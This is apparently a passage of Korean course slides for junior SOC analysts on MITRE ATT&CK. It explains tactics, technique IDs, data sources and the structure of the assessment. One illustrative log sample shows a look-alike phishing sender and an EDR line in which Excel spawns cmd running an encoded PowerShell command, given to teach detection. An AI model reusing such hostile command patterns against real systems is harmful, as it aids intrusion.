Module 5. MITRE ATT&CK 기반 위협 분석 (12H)

26년 AI 보안운영 및 위협탐지 실무인력 양성 · (주)아울네스트

Module 5.
MITRE ATT&CK
기반 위협 분석

공격자 행동을 ATT&CK 언어로 읽고 · 로그를 체인으로 연결하고 · 탐지와 대응까지 설계한다 · 12시간

대상

SOC 초급 분석가 / 보안 입문자

시간

총 12시간 (이론 5H + 사례 3H + 실습 4H)

핵심 주제

Tactic · Technique · Sub-technique · Data Source · Navigator · Coverage · Hunting · Threat Scenarios

🎯

(주)아울네스트

한국인터넷진흥원 발주 · 2026

학습 목표와 수강 후 아웃풋

이벤트를 단편적으로 보는 수준을 넘어, 공격 흐름과 탐지 공백을 문장으로 설명할 수 있어야 한다

PART 0 · 오프닝

🎯 수강 후 다음 세 가지를 할 수 있어야 합니다

 매핑 역량로그와 이벤트를 Tactic / Technique / Sub-technique 수준으로 매핑하고, 근거와 Confidence를 함께 기록한다.
T1566 PhishingT1078 Valid Accounts
 탐지 설계 역량ATT&CK 기반 탐지 룰과 헌팅 플레이북을 작성하고, SIEM/SOAR 연계 흐름을 설명한다.
Detection RuleHunt Hypothesis
 보고 역량침해 시나리오를 단계별로 재구성하고 근거 로그를 제시하며, IR 팀에 전달할 분석문을 작성한다.
Attack ChainNext Action

최종 산출물: 매핑표 · 탐지 쿼리 · 헌팅 가설 · 분석 보고서 · 캡스톤 발표자료

💡 평가 기준: 정답 암기가 아닌 논리성 · 근거 제시 · 다음 액션 제안 능력에 맞춰져 있습니다

보강 설명수강생이 마지막에 남겨야 할 것은 슬라이드 기억이 아니라 판단 프레임입니다. 데이터 원천·오탐 구분·운영 액션까지 연결해야 실무 적용도가 높아집니다.

T1566T1078매핑

설계 포인트

T1566에 필요한 Data Source를 먼저 정리하기
T1078를 어떤 조건으로 탐지할지 구체화하기
룰·대시보드·플레이북을 같은 언어로 정렬하기

튜닝 포인트

화이트리스트·시간대·자산 중요도 조건 추가
False Positive와 False Negative를 따로 점검
검증 결과를 Coverage 점수에 반영하기

운영 적용

분기별 ATT&CK 버전 업데이트를 체크리스트화
CTI·Purple Team 결과를 룰 개선 backlog로 연결
티켓 문장까지 동일한 ATT&CK 용어로 통일

왜 많은 SOC가 ATT&CK을 공통 언어로 쓰는가

경보 수천 개를 공격자 행동이라는 공통 틀로 묶어 주는 해석 언어

PART 0 · 오프닝

ATT&CK 없이: 팀마다 다른 언어

같은 사건도 팀마다 표현이 달라 인수인계·보고·재현이 어렵다
"PowerShell 실행 감지" vs "스크립트 인터프리터 악용" vs "T1059" — 모두 같은 사건
탐지 개수를 세도 '어떤 공격 단계를 얼마나 보는지' 파악 불가
담당자 이직 시 지식이 사라지는 '사람 종속' 운영

ATT&CK 도입 후: 구조화된 해석

ATT&CK은 '무슨 일이 일어났는가'를 기술 이름과 단계로 압축
탐지 엔지니어 → 룰 매핑 / 헌터 → 빈 구간 탐색 / IR → 흐름 설명
Coverage 히트맵으로 '우리가 무엇을 보고 무엇을 못 보는가' 가시화
ATT&CK은 분류 체계인 동시에 운영 언어다

수천 개 경보

→

ATT&CK
기술 분류

→

공격 체인
재구성

→

대응
우선순위

→

운영 개선

💡 실무 포인트: '탐지가 있어도 설명이 안 되면 운영 품질이 낮다' — ATT&CK으로 사건을 설명할 수 있어야 진정한 SOC 역량이다

보강 설명경보는 수천 개지만 ATT&CK은 공격자 행동이라는 공통 틀로 묶어 줍니다. 메일·VPN·EDR 경보가 따로 떠도 ATT&CK으로 보면 하나의 시나리오로 묶입니다. 시간축과 로그 근거를 함께 묶어 설명하면 공격 체인의 맥락이 훨씬…

T1059공통 언어공격 체인

시나리오 확장

T1059가 앞뒤 단계와 어떻게 이어지는지 정리
공통 언어를 시간축으로 놓고 체인으로 연결하기
공격자 목적과 피해 자산을 한 문장으로 설명

판단 포인트

정상 운영과 다른 기준 2~3개를 명확히 적기
계정·프로세스·네트워크 증거를 함께 교차 보기
차단 시점과 피해 최소화 지점을 구분해 보기

실무 적용

즉시 조치와 후속 조치를 나눠서 제안
보고 문장에는 ATT&CK ID와 영향 범위 포함
재발 방지를 위한 룰·정책 보완점까지 적기

이 모듈의 범위와 제외 범위

ATT&CK을 외우는 수업이 아니라 SOC 운영에 필요한 만큼 전략적으로 쓰는 법을 배운다

PART 0 · 오프닝

포함 범위 ✅

Enterprise ATT&CK 핵심 구조 — Tactic 14개, Technique 계층, Sub-technique 개념
Data Source / Component / Detection Strategy — 로그-Technique 연결 방법론
ATT&CK Navigator / Coverage 분석 — 가시성과 탐지 품질 평가
Threat Hunting 방법론 — 가설 기반 능동 탐색
대표 SOC 시나리오 5종 — 피싱 / 웹침투 / 정상계정악용 / Beaconing / Brute Force
탐지 엔지니어링 — SIEM 룰 설계, SOAR 연계, 플레이북 작성

제외 범위 ❌

특정 멀웨어 제작법 및 익스플로잇 실습
공격 자동화 코드와 공격 실행 중심 상세
특정 벤더 제품 기능 구현·설정 실습
ATT&CK ID 전체 암기 (약 600+ Technique)

관점: 방어 · 탐지 · 분석 · 보고 중심

핵심 메시지: ATT&CK을 아는 분석가 ≠ ID를 외운 분석가. 로그를 보고 공격 흐름을 설명할 수 있는 분석가가 진정한 실력자다

보강 설명 이번 모듈은 ATT&CK 자체를 외우는 수업이 아니라, SOC 운영에 필요한 만큼 전략적으로 쓰는 법을 다룹니다. 해킹 실습이 아닌 방어 해석 훈련임을 명확히 해 주세요. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

Enterprise ATT&CK방어·탐지·분석·보고범위 제외

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
Enterprise ATT&CK를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

12시간 운영 맵

이론 → 사례 분석 → 실습을 반복하는 순환 학습 구조

PART 0 · 오프닝

 이론 파트 5H
Part 0 — 오프닝 · 목표 · 모듈 연결 (20분)
Part 1 — ATT&CK 기본 구조 · 14개 Tactic (70분)
Part 2 — Data Source · Detection Strategy (50분)
Part 3 — Tactic별 심화 관찰 포인트 (150분)


 시나리오 파트 3H
Part 4 — 피싱 기반 침해 시나리오 (50분)
Part 5 — 웹 취약점 침투 시나리오 (45분)
Part 6 — 정상 계정 악용 시나리오 (35분)
Part 7 — C2 Beaconing 분석 (25분)
Part 8 — Brute Force 시나리오 (25분)


 실습 파트 4H
Part 9 — 탐지 엔지니어링 실습 (80분)
Part 10 — Hunting / Coverage 워크숍 (70분)
Part 11 — 종합 실습 6종 + 캡스톤 (90분)
Part 12 — 부록 · 마무리 (20분)

📚 이론
(기초 용어)

→

🔍 사례 분석
(로그 해석)

→

🛠️ 탐지 설계
(Rule 작성)

→

🔎 Hunting
(가설 탐색)

→

캡스톤
(종합 발표)

📌 원칙: 각 파트는 반드시 로그 근거와 다음 액션으로 마무리합니다

보강 설명 이론·사례·실습을 반복해 용어 이해 → 해석 → 직접 설계의 순환 구조로 학습합니다. 각 파트가 독립된 수업이 아니라 하나의 기술 스택처럼 이어진다고 설명해 주세요. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

이론 5H사례 3H실습 4H

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
이론 5H를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

Module 1~4와 Module 5의 연결

ATT&CK은 앞서 배운 로그를 하나의 공격 서사로 연결해 주는 상위 해석 프레임이다

PART 0 · 오프닝

Module 1 — SOC 운영 기반

SOC 역할 · SIEM · SOAR 개념은 ATT&CK을 운영 체계에 얹는 기반. SIEM 룰에 Technique 태그를 붙이고 SOAR 플레이북을 설계하는 기초가 된다.

SIEM Rule → ATT&CK TagSOAR Playbook

Module 2 — Linux 로그

/var/log/auth.log, syslog, auditd 로그는 Execution / Privilege Escalation / Persistence / Credential Access 해석에 핵심 데이터다.

T1059 ExecutionT1078 Valid Accounts

Module 3 — 네트워크·패킷

NetFlow, DNS, Proxy, Firewall 로그는 Discovery / C2 / Exfiltration / Lateral Movement 판단의 근거. Beaconing 탐지는 네트워크 로그가 필수다.

T1071 C2T1018 Discovery

Module 4 — 웹 공격 로그

access.log, 웹 공격 패턴 분석은 Initial Access / Persistence / Impact 해석으로 이어짐. T1190 Exploit Public-Facing Application의 직접 증거가 된다.

T1190 ExploitT1505.003 WebShell

통합 포인트: 각 모듈의 로그 → ATT&CK Technique 매핑 → 공격 체인 재구성 → 탐지·대응 설계로 이어집니다

보강 설명 ATT&CK은 앞서 배운 로그를 하나의 공격 서사로 연결하는 상위 해석 프레임입니다. 각 모듈의 대표 로그 한 줄을 말하고 어느 Tactic으로 이어지는지 질문형으로 던져 주세요. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

Module 연결Initial AccessPersistence

이해 포인트

Module 연결를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
Initial Access 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

평가 구조 미리 보기

정답 암기가 아닌 근거 기반 추론과 실무 전달력을 평가한다

PART 0 · 오프닝

공격 흐름 연결력

단편적 이벤트를 ATT&CK 체인으로 논리적으로 연결했는가? 공격자 목적과 다음 단계 예측 포함.

로그 근거 제시

ATT&CK 매핑에 구체적인 로그 라인 / 이벤트 ID / 패킷을 근거로 제시했는가? Confidence 표기 포함.

탐지·헌팅·대응 현실성

제안한 탐지 룰이 실제 운영 환경에서 동작 가능한가? 오탐 위험과 튜닝 포인트 고려.

보고·발표 전달력

시작-진행-영향-다음 행동을 청중이 이해하는 언어로 설명했는가? 30초 구두 설명 가능 여부 포함.

평가 영역	비중	핵심 기준
ATT&CK 매핑 정확도	25%	Technique ID + 근거 로그 + Confidence
공격 흐름 재구성	30%	체인 완성도, Tactic 전환 논리, 빈 구간 식별
탐지·헌팅 설계	25%	룰 조건 현실성, 오탐 고려, 액션 제시
발표 전달력	20%	청중 눈높이, 구조적 설명, Q&A 대응

💡 캡스톤은 발표 실습까지 포함되므로 슬라이드 문구와 말하기 모두 중요합니다

보강 설명분석가는 정답 하나를 맞히는 사람이 아니라 근거가 강한 설명을 선택하는 사람입니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워 두면 발표 완성도가 높아집니다.

논리성근거 제시탐지 설계

설명 확장

논리성 기준으로 첫 단서를 먼저 분류하기
근거 제시를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

PART 1

ATT&CK 프레임워크
기본 이해

ATT&CK 구조·용어·객체를 정확히 이해하고, Enterprise 14개 Tactic의 전체 지형을 파악한다

⏱️ 약 70분 📌 Tactic · Technique · Sub-technique · Procedure 📌 Enterprise Matrix 14개 Tactic 전체

ATT&CK은 무엇이고 무엇이 아닌가

판단을 대신하는 도구가 아니라, 판단을 구조화하는 도구

PART 1 · 기본 이해

ATT&CK이 하는 일

실제 APT / 사이버 범죄 그룹의 공격 목적과 행동 패턴을 기술적으로 분류하고 연결한다
공격자가 사용한 도구·로그·절차를 공통 언어(Technique ID)로 표현한다
방어자가 탐지 룰을 작성하고 Coverage를 평가하는 기준이 된다
IR에서 '아직 보지 못한 구간'을 질문하게 만드는 체크리스트 역할을 한다
CTI 보고서의 공격 행위를 SOC 탐지 업무로 연결한다

ATT&CK이 하지 않는 일

위험도 자동 계산 — 같은 Technique도 환경마다 위험도가 다름
환경별 우선순위 자동 결정 — 금융 SOC ≠ 제조 SOC ≠ 의료 SOC
탐지의 절대 정답 제공 — 조직 환경에 맞게 조정 필요
오탐 판단 — 같은 이벤트가 정상인지 공격인지는 맥락이 결정
특정 벤더 제품 구현 — ATT&CK은 플랫폼 중립적 지식 체계

핵심 정의: MITRE ATT&CK은 실제 사이버 위협 관찰 결과를 바탕으로 구축된 공격자 행동 지식베이스(Adversary Behavior Knowledge Base)이며, 분류 체계인 동시에 운영 언어다

보강 설명 ATT&CK은 실제 공격자 행동 지식을 정리한 지식베이스이지만, 만능 정답표도 벤더 제품도 아닙니다. 같은 Technique라도 회사마다 중요도가 달라질 수 있다는 현실을 예로 들어 설명해 주세요. 초보자는… 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

지식베이스판단 구조화환경 맥락

이해 포인트

지식베이스를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
판단 구조화 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

ATT&CK의 역사와 버전 관리

살아있는 지식베이스 — 분기별 업데이트로 최신 위협을 반영한다

PART 1 · 기본 이해

2013 — 내부 연구 프로젝트 시작

MITRE 내부 Windows 엔드포인트 APT 행위 분류 목적. Fort Meade Experiment(FMX)에서 출발.

2015 — ATT&CK for Enterprise v1 공개

Initial Access부터 Exfiltration까지 공격 체인 커버. Windows 엔드포인트 중심.

2018~ — 멀티 플랫폼 확장

PRE-ATT&CK 통합, Mobile 도메인 추가. Cloud / SaaS / Azure AD 플랫폼 확장 시작.

현재

v16+ — Data Component 중심 탐지 전략 강화

Sub-technique 세분화, ICS 확장, Identity Provider 플랫폼 추가. 탐지 전략과 Analytics 강화.

버전 관리 습관

MITRE 공식 사이트에서 분기별 릴리즈 노트 확인
새 Technique 추가 / 기존 Technique 수정 / Deprecated 처리 구분
내 SIEM 룰이 최신 ID를 쓰고 있는지 정기 점검
attack.mitre.org → Versions History 메뉴 활용

📍 현재 버전 확인: attack.mitre.org → Versions 메뉴에서 전체 버전 히스토리와 변경 로그 확인 가능

보강 설명 ATT&CK은 2013년 MITRE 내부 프로젝트로 시작해 현재는 Cloud, SaaS, ICS, Mobile까지 확장되었습니다. 버전이 정기적으로 업데이트되므로 분기별 변경 확인 습관이 중요합니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

버전 관리EnterpriseMobile

이해 포인트

버전 관리를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
Enterprise 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

ATT&CK 주요 객체: Tactic / Technique / Sub-technique / Procedure

계층 구조에 맞춰 해석해야 공격 의도와 행위를 정확히 전달할 수 있다

PART 1 · 기본 이해

Tactic (전술) — 왜? (목적)

공격자의 목적(Why). Enterprise에는 14개 Tactic이 있으며 각각이 공격 라이프사이클의 단계를 나타낸다.

Initial AccessExecutionPersistence

Technique (기법) — 어떻게? (방법)

목적을 이루는 일반화된 방법(How). 예: T1566 Phishing, T1078 Valid Accounts, T1059 Command and Scripting Interpreter

T1566 PhishingT1078 Valid Accounts

Sub-technique — 어떤 세부 유형?

더 구체적인 실행 형태(Specific How). 예: T1566.001 Spearphishing Attachment, T1059.001 PowerShell

T1566.001 AttachmentT1059.001 PowerShell

Procedure — 현실에선?

특정 그룹/캠페인이 실제로 구현한 절차(In the Wild). CTI 보고서의 "APT28이 X를 사용해 Y를 했다"가 Procedure다.

APT28 ProcedureCTI Report Evidence

Tactic
왜? (목적)

→

Technique
어떻게? (방법)

→

Sub-technique
세부 유형

→

Procedure
실제 사례

보강 설명 분석가는 관측된 행위를 곧바로 공격 전체라고 부르지 않고, 계층 구조에 맞춰 해석해야 합니다. 로그는 대개 Procedure의 흔적을 남기지만 SOC는 그것을 Technique와 Tactic으로 일반화합니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

TacticTechniqueSub-technique

이해 포인트

Tactic를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
Technique 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

실전 예시: T1566 Phishing 계층 해석

로그는 Procedure 흔적을 남기고, 분석가는 그것을 Technique → Tactic으로 올려서 읽는다

PART 1 · 기본 이해

Tactic: Initial Access (TA0001)

공격자의 목적 = 내부 네트워크에 첫 발판을 마련하는 것

Technique: T1566 Phishing

방법 = 피싱 메시지를 통해 사용자를 속이거나 악성 코드를 배포

T1566.001 Spearphishing AttachmentT1566.002 Spearphishing LinkT1566.003 via Service

Sub-techniques — 세부 형태

첨부파일 / 링크 / 서비스 채널별 분류

Procedure (실제 사례)

"APT28이 2024년 결산보고서.xlsm 파일명으로 매크로 첨부파일 피싱 수행"

# 메일 서버 로그 (Procedure 흔적) From: security@m1cr0s0ft.com To: finance@company.com Subject: [긴급] 2024년 결산보고서.xlsm # EDR 로그 (Sub-technique 증거) excel.exe spawns cmd.exe cmd.exe /c powershell -enc JAB...

분석가의 해석 흐름:
excel.exe → cmd.exe 확인
→ T1566.001 (Spearphishing Attachment) 매핑
→ Tactic: Initial Access로 상위 분류

보강 설명 하나의 예시로 T1566 Phishing 계층 전체를 보여주면 수강생이 객체 구조를 직관적으로 이해합니다. 로그에서 나오는 것은 주로 Procedure 레벨이고, 분석가가 이를 Technique/Tactic으로… 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

T1566PhishingSpearphishing

이해 포인트

T1566를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
Phishing 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

ATT&CK 도메인과 SOC에서 가장 많이 보는 범위

SOC 실무는 Endpoint만이 아니라 Identity · Cloud · SaaS · Network 흔적을 동시에 본다

PART 1 · 기본 이해

 Enterprise (주요 범위)
Windows — 가장 많은 Technique 커버, EDR/SIEM 핵심
Linux / macOS — 서버, CI/CD, 개발 환경
Containers — Docker, Kubernetes 이상 행위
Network Devices — 라우터, 방화벽 설정 변경
IaaS / SaaS / Identity Provider — 클라우드 공격 급증


 Mobile
iOS / Android 디바이스 대상 공격
모바일 MDM 우회, 앱 기반 데이터 수집
기업 BYOD 환경에서 중요성 증가
일반 SOC에서는 보조 참조용으로 활용


 ICS (산업제어)
SCADA, PLC, OT 환경 공격 분류
Stuxnet, TRITON 같은 ICS 전용 공격
제조 · 에너지 · 발전 SOC에서 필수
일반 IT SOC와는 다른 탐지 접근 필요

최근 트렌드: 사고의 상당수가 Identity(계정 탈취) → SaaS 데이터 접근 → Cloud IaaS 권한 상승 경로로 진행됩니다. 기존 EDR 시야만으로는 공격 체인을 볼 수 없습니다.

💡 이번 모듈 범위: Enterprise ATT&CK 중심 — Windows/Linux Endpoint + Network + Web + Identity + 기초 Cloud 로그까지 커버

보강 설명 SOC 실무에서 가장 많이 쓰는 것은 Enterprise지만, 클라우드·SaaS·IdP·컨테이너까지 시야를 넓히는 것이 중요합니다. 최근 사고는 Identity, SaaS, Cloud control plane… 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

EnterpriseMobileICS

이해 포인트

Enterprise를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
Mobile 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

Enterprise ATT&CK의 14개 Tactic 전체 지형

사전 준비부터 최종 영향까지 — 공격 라이프사이클의 14개 목적 축

PART 1 · 기본 이해

TA0043

Reconnaissance

사전 정찰

TA0042

Resource Dev.

자원 확보

TA0001

Initial Access

초기 침투

TA0002

Execution

코드 실행

TA0003

Persistence

지속성 확보

TA0004

Privilege Esc.

권한 상승

TA0005

Defense Evasion

탐지 회피

TA0006

Credential Access

자격증명 탈취

TA0007

Discovery

내부 정찰

TA0008

Lateral Movement

내부 이동

TA0009

Collection

데이터 수집

TA0011

Command & Control

C2 통신

TA0010

Exfiltration

데이터 유출

TA0040

Impact

목표 달성

💡 큰 흐름으로 기억: 🔍 사전 준비(Recon · Resource Dev) → 🚪 침투·내부(IA · Exec · Persist · PrivEsc · DefEvas · CredAcc) → 🔀 확산·수집(Disco · LatMov · Coll) → 📡 운영·결과(C2 · Exfil · Impact)

보강 설명 14개 Tactic을 한 번에 외우려 하지 말고, 사전 정찰/침투/내부 확산/결과의 큰 흐름으로 먼저 이해하게 해주세요. 각 Tactic의 영문 이름과 ID는 실무에서 쓰이므로 익숙해져야 합니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

14개 TacticReconnaissanceInitial Access

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

Technique ID 체계 읽는 법

T로 시작하는 4자리 숫자와 Sub-technique 점 표기 — ID 체계를 알면 검색이 빠르다

PART 1 · 기본 이해

Technique ID 구조

T1566 # Technique T1566.001 # Sub-technique (.NNN) TA0001 # Tactic ID (TA 접두어) G0016 # Group ID (위협 행위자) S0002 # Software (도구/멀웨어)

T = Technique / TA = Tactic / G = Group / S = Software
Sub-technique는 점(.) 뒤에 세 자리: T1566.001

예시 ID	이름	분류
T1566	Phishing	Technique
T1566.001	Spearphishing Attachment	Sub-technique
T1078	Valid Accounts	Technique
T1078.002	Domain Accounts	Sub-technique
T1059	Command and Scripting Interpreter	Technique
T1059.001	PowerShell	Sub-technique
T1110	Brute Force	Technique
T1110.003	Password Spraying	Sub-technique

💡 검색 팁: attack.mitre.org 검색창에 T1566 입력 → 전체 정보 확인. Sub-technique는 해당 Technique 페이지 하단에 목록으로 표시

보강 설명 T와 숫자 조합 ID 체계를 이해하면 ATT&CK 웹사이트에서 빠르게 찾을 수 있습니다. ID 자체를 외우기보다 검색해서 찾는 습관이 실무에서 더 중요합니다. 대표 예시와 연결해 기억하면 이해가 더 오래 남습니다.

T1566T1566.001Technique ID

이해 포인트

T1566를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

ATT&CK Technique 페이지 구조 읽는 법

공식 페이지에서 탐지 설계에 필요한 정보를 어디서 찾는지 알아야 실무 활용이 된다

PART 1 · 기본 이해

Description (설명)

Technique의 정의, 공격자가 이것을 왜 사용하는지, 어떤 플랫폼에서 동작하는지 설명. 용어 오해를 방지하는 출발점.

Procedure Examples (실제 사례)

실제 위협 행위자 그룹(G)이나 도구(S)가 이 Technique를 사용한 사례. CTI 연동의 핵심 섹션.

Detection (탐지 전략) ← 핵심

Data Source와 Data Component가 명시됨. 어떤 로그에서 무엇을 봐야 하는지 가이드. 탐지 룰 설계의 출발점.

Mitigations (완화 방법)

탐지 외에 예방 차원에서 적용 가능한 통제 방법. 보안 아키텍처 설계 시 참고.

Detection 섹션 활용법

Data Source 확인 → "어떤 센서/로그가 필요한가"
Data Component 확인 → "그 로그에서 구체적으로 무엇을 관찰하나"
Detection 설명 텍스트에서 탐지 로직 힌트 추출
Analytics 링크에서 구체적 탐지 조건 참조

# T1566.001 탐지 정보 예시 (요약) Data Source: File Component: File Creation Data Source: Process Component: Process Creation # 의미: 첨부파일 생성 + 프로세스 실행을 함께 봐야

보강 설명 ATT&CK 공식 사이트의 Technique 페이지에는 Description, Procedure Examples, Detection, References가 포함됩니다. Detection 섹션에서 Data… 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

Technique 페이지Procedure ExamplesDetection

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
Technique 페이지·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

PART 2

데이터·로그·탐지 관점
Data Source & Detection Strategy

ATT&CK의 탐지 관련 핵심 개념 — Data Source / Component / Detection Strategy / Analytics / Coverage

⏱️ 약 80분 📌 Data Source · Data Component 📌 매핑 프로세스 · Confidence · Navigator

ATT&CK Data Source란 무엇인가

탐지 설계의 출발점 — 어떤 센서/로그를 수집해야 이 Technique를 볼 수 있는가

PART 2 · 탐지 관점

📡 Data Source = 특정 Technique 탐지에 필요한 로그·이벤트·센서의 주제 분류(Category)

 Host-based Sources
Process — 프로세스 생성/종료/수정
File — 파일 생성/수정/삭제/접근
Windows Registry — 레지스트리 키 변경
Module — DLL/모듈 로드
Scheduled Job — 예약 작업 변경
Service — 서비스 등록/시작
Script — 스크립트 실행


 Network Sources
Network Traffic — 패킷/플로우/연결
DNS — 도메인 쿼리/응답
Application Log — 웹/앱 서버 로그
Certificate — TLS 인증서 정보
Web Credential — 웹 기반 자격증명


 Identity / Cloud Sources
User Account — 계정 생성/수정/로그인
Logon Session — 세션 생성/종료
Cloud Storage — 버킷/스토리지 접근
Instance — 클라우드 VM 조작
Active Directory — AD 객체 변경

💡 실무 연결: ATT&CK Technique 페이지 → Detection 탭 → Data Source 목록 확인 → 우리 SIEM에 해당 로그가 수집되는지 체크하는 것이 Coverage 분석의 첫 단계

보강 설명 Data Source는 로그나 센서의 주제 영역입니다. Process, File, Network Traffic 등이 있습니다. Data Source는 수집 대상이고, Data Component는 그 안에서… 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

Data SourceProcessFile

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
Data Source·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

Data Component: Data Source 안의 실제 관찰 항목

Process라는 카테고리 안에서 구체적으로 무엇을 관찰하는지 정의하는 개념

PART 2 · 탐지 관점

Data Source	Data Component (예시)
